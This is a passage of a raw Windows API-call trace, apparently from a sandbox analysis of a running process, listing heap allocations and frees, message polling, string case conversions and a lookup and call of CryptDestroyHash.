hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.680] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.680] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.680] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.681] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.681] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0253.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0253.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0253.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0253.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.685] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0253.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0253.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.685] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0253.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.689] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0253.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0253.692] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 